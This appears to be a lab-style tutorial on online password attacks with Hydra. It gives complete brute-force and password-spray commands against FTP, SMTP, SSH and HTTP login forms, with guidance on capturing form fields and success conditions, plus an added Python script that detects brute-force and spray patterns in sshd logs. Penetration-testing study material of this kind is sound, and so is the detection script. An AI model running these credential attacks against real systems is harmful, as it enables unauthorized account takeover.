Online attacks

Hydra

Hydra can perform password attacks (one user, multiple passwords) as well as spray attacks (multiple users, one password). For a spray, just use hydra -L user-list.txt -p 12345

-l specific user “admin”

-L User list

-p specific password “12345”

-P password list

FTP

As an example, we attack an FTP server:

hydra -l ftp -P passlist.txt ftp://10.10.x.x -v

-l ftp specifies a single username; use -L for a username wordlist.

-P Path specifies the full path of the wordlist; you can specify a single password by using -p.

ftp://10.10.x.x is the protocol and the IP address or the fully qualified domain name (FQDN) of the target.

-v shows detailed (verbose) activity of Hydra.

SMTP/S

hydra -l email@company.xyz -P /path/to/wordlist.txt smtp://10.10.x.x:25 -v

hydra -l email@company.xyz -P /path/to/wordlist.txt smtps://10.10.x.x:465 -v

SSH

hydra -L users.lst -P /path/to/wordlist.txt ssh://10.10.x.x -v
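Seen from the server side, the two attack shapes described at the top of this page (one user with many passwords, many users with one password) leave different patterns in sshd failure logs. The following is an added example, not part of the original notes; the log lines are constructed and the thresholds are illustrative assumptions.

```python
import re
from collections import Counter, defaultdict

# sshd "Failed password" line; "invalid user" marks accounts that do not exist.
FAILED = re.compile(r"Failed password for (?:invalid user )?(\S+) from (\S+) port \d+")

def _fail(sec, user, ip, invalid=False):
    """Build one constructed sshd failure line (sample data, not a real log)."""
    who = f"invalid user {user}" if invalid else user
    return (f"Jan 10 10:00:{sec:02d} host sshd[101]: "
            f"Failed password for {who} from {ip} port 40000 ssh2")

# Constructed sample: one guessing source, one spraying source, one typo-prone user.
SAMPLE_LOG = "\n".join(
    [_fail(s, "admin", "10.10.0.5") for s in range(6)]
    + [_fail(10 + i, u, "10.10.0.9", invalid=(u == "guest"))
       for i, u in enumerate(["alice", "bob", "carol", "dave", "erin", "guest"])]
    + [_fail(30 + s, "alice", "10.10.0.20") for s in range(2)]
    + ["Jan 10 10:00:40 host sshd[101]: Accepted password for alice "
       "from 10.10.0.20 port 40000 ssh2"]
)

def classify_sources(log_text, min_failures=5, spray_max_per_user=2):
    """Label each source IP by the shape of its failed logins.

    Thresholds are illustrative assumptions; tune them to local baselines.
    """
    per_ip = defaultdict(Counter)
    for line in log_text.splitlines():
        m = FAILED.search(line)
        if m:
            user, ip = m.groups()
            per_ip[ip][user] += 1

    verdicts = {}
    for ip, users in per_ip.items():
        if sum(users.values()) < min_failures:
            verdicts[ip] = "below-threshold"
        elif len(users) == 1:
            verdicts[ip] = "brute-force"      # one user, many passwords
        elif max(users.values()) <= spray_max_per_user:
            verdicts[ip] = "spray"            # many users, few tries each
        else:
            verdicts[ip] = "mixed"
    return verdicts

if __name__ == "__main__":
    for ip, label in classify_sources(SAMPLE_LOG).items():
        print(ip, label)
```

A per-account lockout counter alone catches the first pattern but not the second, which is why the spray case is counted per source across accounts.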

HTTP

First we need to know what to brute-force. It is important to specify the type of HTTP request (GET/POST): attempt to log in, then press F12 and open the Network tab.

Finding & Specifying Location of Username/Password Form(s)

This is the hardest part, but it’s actually surprisingly simple. Let’s head back over to our browser window. We should still have the Inspect Element window open on the Network Tab. With our Post request still selected, let’s click Edit and Resend.

Now we see a section called Request Body that contains the username and password you entered earlier! We’ll want to grab this entire request for Hydra to use.

In my case, the unmodified request looks like this: username=InfiniteLogins&password=Password

It can also be username=admin&password=^PASS^ if the user is known to be admin.

hydra -l admin -P 500-worst-passwords.txt 10.10.x.x http-get-form "/login-get/index.php:username=^USER^&password=^PASS^:S=logout.php" -f

Or, matching on the failure message (copy and paste the error message rather than typing it):

hydra -l admin -P 500-worst-passwords.txt 10.10.x.x http-get-form "/login-get/index.php:username=^USER^&password=^PASS^:Invalid Password!" -f

  • -l admin specifies a single username; use -L for a username wordlist.

  • -P Path specifies the full wordlist path; you can use -p for a single password.

  • 10.10.x.x is the target's IP address or fully qualified domain name (FQDN).

  • http-get-form specifies the HTTP request type as either http-get-form or http-post-form.

  • login-get/index.php is the login page path on the target webserver.

  • username=^USER^&password=^PASS^ defines the parameters for brute-forcing, using ^USER^ for usernames and ^PASS^ for passwords from the specified dictionary.

The section below is crucial for avoiding false positives when using Hydra:

  • Specify the 'failed' condition with F= (try a login and watch for the error message).

  • Set success conditions with S= based on server responses for failed and successful login attempts.

  • During enumeration, you can use knowledge about the server. For example, if you find that the server serves logout.php after a valid login, set S=logout.php.

  • Use -f to stop brute-force attacks after finding valid credentials.
